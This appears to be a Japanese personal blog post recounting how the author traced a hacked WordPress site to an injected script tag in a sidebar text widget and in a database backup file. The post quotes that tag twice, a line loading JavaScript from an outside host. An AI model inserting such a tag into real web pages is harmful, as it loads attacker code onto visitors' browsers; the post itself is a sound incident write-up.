【Wordpress】サイトで改ざんされました

Wordpressで管理してるサイトを開こうと思ったら

「警告: 不正なソフトウェアが存在する可能性があります」
と表示されました。

サイト内のどこかに不正な→abrahamspath.org.ukヘのリンクを含んでいると。。。


まずは落ち着くこと。。。
冷静に冷静に。

一番はじめにサイトをメンテナンス中にしました。


次に、どこが改ざんされたんだろうとサーバー上のファイルをくまなく探しました。
タイムスタンプを見て、覚えのない時間に更新されたものを探しました。



でも、ないんです（＞＜）

それらしき怪しい更新のファイルがない！


次にやったことは

1）
ルートディレクトリごとサーバーからダウンロードしました。

2）
後から原因究明できるかもしれないので、改ざんされた状態のまま
バックアップとりました。

3）
ネットを切断し、DWで全検索「abrahamspath」かけました。

すると出てきたんです！

データベースバックアップ　プラグイン　「WP-DBManager」
その中のバックアップファイル
/wp-content/backup-db/　　内のsqlファイルです。

4)
そのファイルをテキストエディタ　Terapad　で開きました。

5）
そこでまた「abrahamspath」の検索。

そしたら
<script type=\"text/javascript\" src=\"http://abrahamspath.org.uk/cb.php\"></script>

がどこかに埋め込まれているようです！

正直、ソースを見てもどこなのかははっきりわからない！

だけど、上下のたまに出てくる文字列、リンクから察するに、
サイドバーのあたりじゃないかという気がしました。

6）
サイドバーのphpファイルを確認するも問題ない。。

次に見たのが　ウィジェット　です！

そこで見つけました!!!!!



サイドバーウィジェットの中に「テキスト」が作られていて

<script type=\"text/javascript\" src=\"http://abrahamspath.org.uk/cb.php\"></script>

ありました。


なぜそんなところ、すぐに見つけられなかったのか、
情けない限りですが(笑）

こんなパターンで不正なタグが書き込まれることもありますので、
参考までに(^^)


ローカルのウイルスチェックをして、感染してないことに一安心です！



パスワードはこまめに変えましょうね。